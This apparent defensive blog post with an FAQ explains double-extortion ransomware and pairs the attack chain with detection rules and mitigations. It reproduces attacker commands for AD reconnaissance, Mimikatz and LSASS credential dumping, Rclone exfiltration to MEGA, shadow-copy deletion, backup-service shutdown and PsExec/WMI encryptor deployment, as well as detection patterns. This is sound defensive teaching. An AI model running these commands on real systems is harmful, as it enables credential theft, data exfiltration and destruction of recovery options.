"What is double extortion ransomware?"

"Double extortion is a ransomware model where the attacker exfiltrates sensitive data before encrypting it. The victim faces two threats simultaneously: restore access to encrypted files (by paying for the decryption key) and prevent publication of stolen data on a leak site (by paying a separate or combined ransom). This model emerged around 2019 with Maze ransomware and is now the dominant model among professional ransomware groups."

"What is triple extortion ransomware?"

"Triple extortion adds a third pressure tactic — typically a DDoS attack against the victim's public infrastructure, or direct contact with the victim's customers, partners, or regulators to amplify reputational and legal pressure. The Clop group and REvil have used this technique against healthcare and financial sector victims."

"How do ransomware groups exfiltrate data before encrypting it?"

"Groups commonly use legitimate cloud sync tools (Rclone configured to MEGAsync, Google Drive, or S3), legitimate file archiving tools (7zip, WinRAR), and LOLBins like robocopy or xcopy. Some groups deploy custom exfil implants. Traffic often blends into normal business operations, making detection difficult without DLP and egress monitoring."

"How long does a ransomware attack typically take from initial access to encryption?"

"Dwell times vary significantly. Historically, ransomware groups averaged 5–10 days between initial access and encryption deployment. Cl0p leveraging the MOVEit zero-day operated in hours to days. LockBit affiliates have been observed encrypting within 24 hours of initial access. Longer dwell times (days to weeks) are associated with hands-on-keyboard operators performing reconnaissance, credential harvesting, and data exfiltration before triggering encryption."

"Should organizations pay ransomware demands?"

"The FBI and CISA advise against paying ransoms, as payment does not guarantee data recovery or deletion from leak sites, and it funds future attacks. However, many organizations facing operational shutdown evaluate it as a business decision. If paying, engage a ransomware negotiation firm (Coveware, Kivu Consulting) and understand that OFAC sanctions apply to payments to designated groups — LockBit's affiliated individuals have appeared on OFAC SDN lists."

"What is Volume Shadow Copy deletion and why do ransomware groups do it?"

"Volume Shadow Copies (VSS) are Windows backup snapshots that allow file recovery without a full backup restoration. Ransomware groups delete them using vssadmin.exe or wmic.exe commands to prevent victims from recovering without paying. Detection of VSS deletion commands is a high-fidelity indicator of ransomware pre-detonation activity."

"What backup strategy is most effective against ransomware?"

"The 3-2-1-1-0 backup rule: 3 copies, 2 different media types, 1 offsite, 1 immutable (write-once/air-gapped), and 0 errors verified by regular restore testing. Immutable backups stored in a separate tenancy (different cloud account, separate credentials) are the most effective ransomware countermeasure, as threat actors who compromise your primary environment cannot access or modify them."

Ransomware Double Extortion: They Encrypt AND Leak Your Data

In 2019, the Maze ransomware group made a strategic decision that fundamentally changed the ransomware threat landscape: they began stealing data before encrypting it. The extortion pressure was no longer just “pay or lose your files” — it became “pay or we publish your files.” When Maze shut down in late 2020, they shared their playbook with other groups. By 2021, double extortion was the industry standard.

This post covers the full technical attack chain — from initial access through exfiltration and encryption — along with the detection logic and defensive controls that create meaningful friction for modern ransomware groups.

The Evolution of Ransomware Extortion

Single Extortion (Pre-2019)

Early ransomware (CryptoLocker, WannaCry, NotPetya) encrypted files and demanded payment for the decryption key. Organizations with working backups could recover without paying. The leverage was purely access restoration.

Weakness for attackers: Mature backup programs eliminated the leverage entirely.

Double Extortion (2019–Present)

Pioneered by Maze in November 2019. The group exfiltrated data from Allied Universal before encrypting and posting stolen files publicly when the ransom was not paid.

Current dominant groups using double extortion:

Group	Notes
LockBit 3.0	Largest affiliate program, bug bounty for own malware, disrupted by law enforcement Feb 2024 but returned
BlackCat/ALPHV	Rust-based ransomware, complex affiliate compensation; exited scam Dec 2023 after $22M Change Healthcare payment
Cl0p	Specializes in zero-day exploitation (MOVEit, GoAnywhere, Accellion) for mass simultaneous victim compromise
Black Basta	Believed to be Conti successor; compromised Ascension Health (900 hospitals) in May 2024
RansomHub	Emerged Feb 2024, absorbed ALPHV affiliates after exit scam; aggressive 90-day data destruction threat

Triple Extortion (2021–Present)

Added vectors include:

DDoS attack against victim infrastructure to disrupt operations and increase pressure.
Direct contact with customers, employees, or regulators — emailing patients about breached health data, notifying journalists, filing SEC reports.
SEC disclosure weaponization: In November 2023, ALPHV filed an SEC complaint against MeridianLink for failing to disclose their breach within 4 days, weaponizing the SEC’s new 4-day disclosure rule.

The Attack Chain: From Initial Access to Leak Site

Step 1: Initial Access

Common entry points:

- Phishing with credential harvesting
- VPN credential stuffing (Pulse Secure, Fortinet, Cisco ASA)
- Exposed RDP (TCP/3389) with weak credentials
- Zero-day exploitation (MOVEit CVE-2023-34362, GoAnywhere CVE-2023-0669)
- Compromised MSP or software supply chain

Step 2: Reconnaissance and Lateral Movement

Post-access, operators spend time mapping the environment:

 1# Commonly observed reconnaissance commands
 2net group "domain admins" /domain
 3net view /domain
 4nltest /domain_trusts
 5wmic computersystem get name, domain
 6arp -a
 7
 8# Active Directory enumeration via PowerView (commonly used)
 9Get-DomainController -Domain target.corp
10Get-DomainUser -Properties samaccountname, memberof | Where-Object {$_.memberof -match "admin"}

Step 3: Credential Harvesting

# Mimikatz (or derivative) — harvest domain credentials
sekurlsa::logonpasswords
sekurlsa::wdigest
lsadump::sam
lsadump::dcsync /domain:target.corp /all /csv

LSASS dump via Task Manager or ProcDump is also commonly observed — these create a .dmp file that can be processed offline:

1# Using ProcDump (Sysinternals — LOLBin)
2procdump.exe -accepteula -ma lsass.exe lsass.dmp
3
4# Using comsvcs.dll (fully native Windows)
5rundll32 C:\Windows\System32\comsvcs.dll MiniDump [LSASS_PID] C:\Windows\Temp\lsass.dmp full

Step 4: Data Exfiltration with Rclone

Rclone is a legitimate open-source tool used by ransomware groups for exfiltration because it supports dozens of cloud storage backends and blends into environments that use cloud sync legitimately.

Typical Rclone configuration for MEGAsync exfil:

 1# Rclone config file — written to disk by attacker
 2# Location: C:\Users\[username]\AppData\Roaming\rclone\rclone.conf
 3
 4[mega]
 5type = mega
 6user = attacker@protonmail.com
 7pass = [encrypted_password]
 8
 9[s3-exfil]
10type = s3
11provider = AWS
12access_key_id = AKIAIOSFODNN7EXAMPLEX
13secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
14region = us-east-1

Exfil command observed in real incidents:

1# Exfiltrate entire share to MEGA
2rclone.exe copy \\fileserver01\Finance mega:stolen-data\finance --transfers 32 --checkers 16 --no-traverse --log-file C:\Windows\Temp\rc.log
3
4# Exfiltrate specific file types (common targeting pattern)
5rclone.exe copy C:\Users --include "*.docx,*.xlsx,*.pdf,*.pst,*.msg" mega:stolen --transfers 20
6
7# Compress before exfil to reduce time/volume detection
87za.exe a -mx=1 C:\Windows\Temp\archive.7z C:\Users\*\Documents\* -r
9rclone.exe copy C:\Windows\Temp\archive.7z mega:data

Step 5: Pre-Encryption Tasks

Before deploying the encryptor, operators ensure maximum impact:

 1# Delete Volume Shadow Copies — prevents file recovery
 2vssadmin delete shadows /all /quiet
 3wmic shadowcopy delete
 4bcdedit /set {default} recoveryenabled No
 5bcdedit /set {default} bootstatuspolicy ignoreallfailures
 6
 7# Disable Windows recovery
 8wmic shadowcopy delete
 9
10# Stop backup services
11net stop "Backup Exec Agent Accelerator and Remote Agent"
12net stop "Veeam Backup Catalog Data Service"
13net stop "SQLWriter"
14net stop "MSSQLSERVER"

Step 6: Encryption Deployment

The encryptor is often deployed via:

Group Policy (if domain admin credentials were obtained).
PsExec lateral spread across identified hosts.
WMI for fileless deployment.

1# PsExec-based mass deployment (common LockBit 3.0 pattern)
2psexec.exe \\[target-IP] -s -d -f -c locker.exe
3
4# WMI-based deployment
5wmic /node:[target-IP] process call create "cmd.exe /c \\fileserver\share\locker.exe"

Detection

PowerShell: Detect Large Outbound Transfers

 1# Monitor for large data transfers via network connection tracking
 2# Run on endpoints or via SIEM correlation
 3
 4Get-NetTCPConnection -State Established |
 5    Where-Object {
 6        $_.RemotePort -in @(443, 80, 2083, 5222) -and
 7        $_.RemoteAddress -notmatch "^(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)"
 8    } |
 9    Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort,
10        @{N="Process"; E={(Get-Process -Id $_.OwningProcess -EA SilentlyContinue).Name}},
11        @{N="Path"; E={(Get-Process -Id $_.OwningProcess -EA SilentlyContinue).Path}} |
12    Where-Object { $_.Process -match "rclone|7za|robocopy|winscp|filezilla" }

Detect Volume Shadow Copy Deletion (Event ID 524 / Sysmon)

-- Splunk SPL: Detect VSS deletion commands
index=windows_security OR index=sysmon
(EventCode=4688 OR EventCode=1)
(
    CommandLine="*vssadmin*delete*" OR
    CommandLine="*wmic*shadowcopy*delete*" OR
    CommandLine="*bcdedit*/set*recoveryenabled*no*" OR
    CommandLine="*wbadmin*delete*catalog*"
)
| table _time, host, user, CommandLine, ParentCommandLine
| sort - _time

-- Splunk SPL: Detect Rclone execution
index=sysmon EventCode=1
(
    Image="*rclone.exe" OR
    CommandLine="*rclone*copy*" OR
    CommandLine="*rclone*sync*"
)
| eval suspicious = if(
    match(CommandLine, "(?i)(mega|dropbox|s3|onedrive|gdrive)"),
    "HIGH", "MEDIUM"
  )
| table _time, host, user, CommandLine, suspicious

Zeek/Suricata Rules for Unusual Cloud Upload Volume

# Suricata rule — alert on high-volume MEGA upload
alert http any any -> $EXTERNAL_NET any (
  msg:"Potential Data Exfil to MEGA.nz";
  http.host;
  content:"mega.nz";
  flow:established,to_server;
  threshold:type threshold, track by_src, count 100, seconds 60;
  classtype:data-loss;
  sid:9000010;
  rev:1;
)

# Zeek script — detect large single-session upload (threshold: 100MB)
event http_reply(c: connection, version: string, code: count, reason: string)
    {
    if ( c$http?$request_body_len && c$http$request_body_len > 104857600 )
        {
        NOTICE([$note=HTTP::Data_Exfil_Threshold,
                $conn=c,
                $msg=fmt("Large upload: %d bytes to %s", c$http$request_body_len, c$id$resp_h)]);
        }
    }

SIEM Correlation: Ransomware Pre-Detonation Kill Chain

Correlate these events within a 24-hour window from the same host:

EventID 4624 — New logon with privileged account (lateral movement).
EventID 7045 — New service installed (persistence or encryptor staging).
Sysmon EventID 1 — Process create: vssadmin, wmic shadowcopy, bcdedit.
Sysmon EventID 3 — Network connection from rclone.exe or 7za.exe to external IP.
Sysmon EventID 11 — File create with extension .lock, .encrypted, .locked, .[group-name].

Defense and Mitigation

1. Immutable Backups — the Primary Countermeasure

 1# AWS S3 Object Lock — WORM storage for backups
 2aws s3api put-object-lock-configuration \
 3    --bucket your-backup-bucket \
 4    --object-lock-configuration '{
 5        "ObjectLockEnabled": "Enabled",
 6        "Rule": {
 7            "DefaultRetention": {
 8                "Mode": "COMPLIANCE",
 9                "Days": 30
10            }
11        }
12    }'
13
14# Verify lock is in place
15aws s3api get-object-lock-configuration --bucket your-backup-bucket

Backups must be:

In a separate account/tenancy with credentials not stored in the production environment.
Tested for restoration quarterly — a backup you have never restored is an assumption, not a backup.
Encrypted at rest and in transit.

2. DLP and Egress Filtering

# Firewall policy — block outbound to known cloud storage from servers
# (servers should not be syncing to consumer cloud storage)
# Apply to server VLAN:

block out quick proto tcp from <server_vlan> to <mega_cidrs> port {80, 443}
block out quick proto tcp from <server_vlan> to <dropbox_cidrs> port {80, 443}

# Alert on rclone-specific user-agent
# Rclone default user-agent: rclone/v1.xx.xx

Enable endpoint DLP to alert on bulk file access:

Windows Information Protection (WIP) for labeled data.
Microsoft Purview DLP for Office 365 data.
Alert when more than 1,000 files are accessed/copied within a 10-minute window.

3. Privileged Access Controls

Tiered administration model: Domain admin accounts should not be usable for interactive logon on workstations.
LAPS: Randomize local administrator passwords per device — prevents lateral movement using a single known credential.
CyberArk or similar PAM: Vault all privileged credentials; require MFA and session recording for use.

4. Endpoint Detection and Response (EDR) Behavioral Rules

Configure your EDR (CrowdStrike, SentinelOne, Microsoft Defender for Endpoint) to alert or block on:

Process creating child processes that delete shadow copies.
lsass.exe being accessed by non-system processes.
Bulk file rename operations (extension change from .docx to .encrypted).
rclone.exe connecting to external IP addresses.
bcdedit modification of boot recovery settings.

5. Network Segmentation

Ransomware operators rely on lateral movement and broad share access. Segmentation limits blast radius:

Micro-segment workstation VLANs — workstations should not reach other workstations via SMB directly.
Restrict SMB (TCP/445) to only legitimate file server IPs.
Place backup servers in an isolated network segment with unidirectional data flow.